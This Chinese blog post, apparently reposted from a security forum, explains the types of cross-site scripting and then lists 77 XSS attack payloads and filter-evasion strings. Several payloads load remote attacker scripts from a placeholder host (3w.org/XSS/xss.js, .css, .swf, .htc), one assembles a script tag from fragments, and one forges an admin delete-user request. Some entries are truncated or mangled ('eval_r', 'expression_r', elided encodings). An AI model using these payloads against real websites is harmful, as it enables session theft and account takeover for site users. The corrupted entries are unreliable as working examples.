• XSS攻击常识及常见的XSS攻击脚本汇总


    一、什么是XSS?

    XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。

    这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。

    二、XSS有什么危害?

    当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。

    关于XSS有关危害,我这里中罗列一段列表,详细介绍不进行更多的赘述:

    • 挂马
    • 盗取用户Cookie。
    • DOS(拒绝服务)客户端浏览器。
    • 钓鱼攻击,高级的钓鱼技巧。
    • 删除目标文章、恶意篡改数据、嫁祸。
    • 劫持用户Web行为,甚至进一步渗透内网。
    • 爆发Web2.0蠕虫。
    • 蠕虫式的DDoS攻击。
    • 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
    • 其它安全问题

    三、XSS分类

    XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS。

    1、反射型XSS

    发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。
    一个简单的例子:
    http://www.a.com/xss/reflect.php的代码如下:

    <?php
    echo $_GET['x'];
    ?>

    如果输入x的值未经任何过滤就直接输出,提交:http://www.foo.com/xss/reflect.php?x=<script>alert(1)</script>
    alert()函数会在浏览器触发。

    2、存储型XSS

    存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码

    最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。

    3、DOM XSS

    DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。
    http://www.a.com/xss/domxss.html代码如下:

    <script>
    eval(location.hash.substr(1));
    </script>

    触发方式为:http://www.a.com/xss/domxss.html#alert(1)

    这个URL#后的内容是不会发送到服务器端的,仅仅在客户端被接收并解执行。
    常见的输入点有:

    document.URL
    document.URLUnencoded
    document.location
    document.referrer
    window.location
    window.name

    xhr请求回来的数据

    document.cookie

    表单项的值

    常见的输出点有:
    直接输出html内容,如:

    document.write(...)
    document.writeln(...)
    document.body.innerHtml=...

    直接修改DOM树(包括DHTML)如:

    document.forms[0].action...(以及其他集合,如:一些对象的src/href属性等)
    document.attachEvent(...)
    document.create...(...)
    document.execCommand(...)
    document.body. ...(直接通过body对象访问DOM)
    window.attachEvent(...)

    替换document URL,如:

    document.location=...(以及直接赋值给location的href,host,hostname属性)
    document.location.hostname=...
    document.location.replace(...)
    document.location.assign(...)
    document.URL=...
    window.navigate(...)

    打开或修改新窗口,如:

    document.open(...)
    window.open(...)
    window.location.href=...(以及直接赋值给location的href,host,hostname属性)直接执行脚本,如:
    eval(...)
    window.execScript(...)
    window.setInterval(...)
    window.setTimeout(...)

    附常见的XSS攻击方法

    (1)普通的XSS JavaScript注入

    <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

    (2)IMG标签XSS使用JavaScript命令

    <IMG SRC=http://3w.org/XSS/xss.js/>

    (3)IMG标签无分号无引号

    <IMG SRC=javascript:alert('XSS')>

    (4)IMG标签大小写不敏感

    <IMG SRC=JaVaScRiPt:alert('XSS')>

    (5)HTML编码(必须有分号)

    <IMG SRC=javascript:alert("XSS")>

    (6)修正缺陷IMG标签

    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

    (7)formCharCode标签(计算器)

    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

    (8)UTF-8的Unicode编码(计算器)

    <IMG SRC=jav..省略..S')>

    (9)7位的UTF-8的Unicode编码是没有分号的(计算器)

    <IMG SRC=jav..省略..S')>

    (10)十六进制编码也是没有分号(计算器)

    <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

    (11)嵌入式标签,将Javascript分开

    <IMG SRC="jav ascript:alert('XSS');">

    (12)嵌入式编码标签,将Javascript分开

    <IMG SRC="jav ascript:alert('XSS');">

    (13)嵌入式换行符

    <IMG SRC="jav ascript:alert('XSS');">

    (14)嵌入式回车

    <IMG SRC="jav ascript:alert('XSS');">

    (15)嵌入式多行注入JavaScript,这是XSS极端的例子

    <IMG SRC="javascript:alert('XSS')">

    (16)解决限制字符(要求同页面)

    <script>z='document.'</script>
    <script>z=z+'write("'</script>
    <script>z=z+'<script'</script>
    <script>z=z+' src=ht'</script>
    <script>z=z+'tp://ww'</script>
    <script>z=z+'w.shell'</script>
    <script>z=z+'.net/1.'</script>
    <script>z=z+'js></sc'</script>
    <script>z=z+'ript>")'</script>
    <script>eval_r(z)</script>

    (17)空字符12-7-1 T00LS - Powered by Discuz! Board

    https://www.a.com/viewthread.php?action=printable&tid=15267 2/6
    perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out

    (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

    perl -e 'print "<SCRIPT>alert("XSS")</SCRIPT>";' > out

    (19)Spaces和meta前的IMG标签

    <IMG SRC=" javascript:alert('XSS');">

    (20)Non-alpha-non-digit XSS

    <SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

    (21)Non-alpha-non-digit XSS to 2

    <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>

    (22)Non-alpha-non-digit XSS to 3

    <SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

    (23)双开括号

    <<SCRIPT>alert("XSS");//<</SCRIPT>

    (24)无结束脚本标记(仅火狐等浏览器)

    <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

    (25)无结束脚本标记2

    <SCRIPT SRC=//3w.org/XSS/xss.js>

    (26)半开的HTML/JavaScript XSS

    <IMG SRC="javascript:alert('XSS')"

    (27)双开角括号

    <iframe src=http://3w.org/XSS.html <

    (28)无单引号 双引号 分号

    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>

    (29)换码过滤的JavaScript

    ";alert('XSS');//

    (30)结束Title标签

    </TITLE><SCRIPT>alert("XSS");</SCRIPT>

    (31)Input Image

    <INPUT SRC="javascript:alert('XSS');">

    (32)BODY Image

    <BODY BACKGROUND="javascript:alert('XSS')">

    (33)BODY标签

    <BODY('XSS')>

    (34)IMG Dynsrc

    <IMG DYNSRC="javascript:alert('XSS')">

    (35)IMG Lowsrc

    <IMG LOWSRC="javascript:alert('XSS')">

    (36)BGSOUND

    <BGSOUND SRC="javascript:alert('XSS');">

    (37)STYLE sheet

    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

    (38)远程样式表

    <LINK REL="stylesheet" HREF="http://3w.org/xss.css">

    (39)List-style-image(列表式)

    <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

    (40)IMG VBscript

    <IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

    (41)META链接url

    <META HTTP-EQUIV="refresh" CONTENT="0;
    URL=http://;URL=javascript:alert('XSS');">

    (42)Iframe

    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

    (43)Frame

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
    https://www.a.com/viewthread.php?action=printable&tid=15267 3/6

    (44)Table

    <TABLE BACKGROUND="javascript:alert('XSS')">

    (45)TD

    <TABLE><TD BACKGROUND="javascript:alert('XSS')">

    (46)DIV background-image

    <DIV STYLE="background-image: url(javascript:alert('XSS'))">

    (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
    8&13&12288&65279)

    <DIV STYLE="background-image: url(javascript:alert('XSS'))">

    (48)DIV expression

    <DIV STYLE=" expression_r(alert('XSS'));">

    (49)STYLE属性分拆表达

    <IMG STYLE="xss:expression_r(alert('XSS'))">

    (50)匿名STYLE(组成:开角号和一个字母开头)

    <XSS STYLE="xss:expression_r(alert('XSS'))">

    (51)STYLE background-image

    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
    CLASS=XSS></A>

    (52)IMG STYLE方式

    exppression(alert("XSS"))'>

    (53)STYLE background

    <STYLE><STYLE
    type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    (54)BASE

    <BASE HREF="javascript:alert('XSS');//">

    (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

    <EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

    (56)在flash中使用ActionScrpt可以混进你XSS的代码

    a="get";
    b="URL("";
    c="javascript:";
    d="alert('XSS');")";
    eval_r(a+b+c+d);

    (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

    <HTML xmlns:xss>
    <?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
    <xss:xss>XSS</xss:xss>
    </HTML>

    (58)如果过滤了你的JS你可以在图片里添加JS代码来利用

    <SCRIPT SRC=""></SCRIPT>

    (59)IMG嵌入式命令,可执行任意命令

    <IMG SRC="http://www.a.com/a.php?a=b">

    (60)IMG嵌入式命令(a.jpg在同服务器)

    Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

    (61)绕符号过滤

    <SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

    (62)

    <SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

    (63)

    <SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

    (64)

    <SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

    (65)

    <SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

    (66)12-7-1 T00LS - Powered by Discuz! Board

    https://www.a.com/viewthread.php?action=printable&tid=15267 4/6
    <SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

    (67)

    <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
    </SCRIPT>

    (68)URL绕行

    <A HREF="http://127.0.0.1/">XSS</A>

    (69)URL编码

    <A HREF="http://3w.org">XSS</A>

    (70)IP十进制

    <A HREF="http://3232235521″>XSS</A>

    (71)IP十六进制

    <A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>

    (72)IP八进制

    <A HREF="http://0300.0250.0000.0001″>XSS</A>

    (73)混合编码

    <A HREF="h
    tt p://6 6.000146.0×7.147/"">XSS</A>

    (74)节省[http:]

    <A HREF="//www.google.com/">XSS</A>

    (75)节省[www]

    <A HREF="http://google.com/">XSS</A>

    (76)绝对点绝对DNS

    <A HREF="http://www.google.com./">XSS</A>

    (77)javascript链接

    <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
  • 相关阅读:
    练习
    js简介、基本语法、类型转换、变量、运算符、分支语句、循环语句、函数、函数调用
    样式表、格式布局、流式布局
    表单
    图片热点、网页划区
    JS模拟窗口
    JavaScript 常用功能实现一览(一)
    分页打印控制 摘自于网络:http://www.cnblogs.com/joinger/articles/1807517.html
    我眼中的C#3.0 摘自于网络:http://www.cnblogs.com/joinger/articles/1297237.html
    .net ToString()用法详解与格式说明
  • 原文地址:https://www.cnblogs.com/blacksunny/p/9164421.html
Copyright © 2020-2023  润新知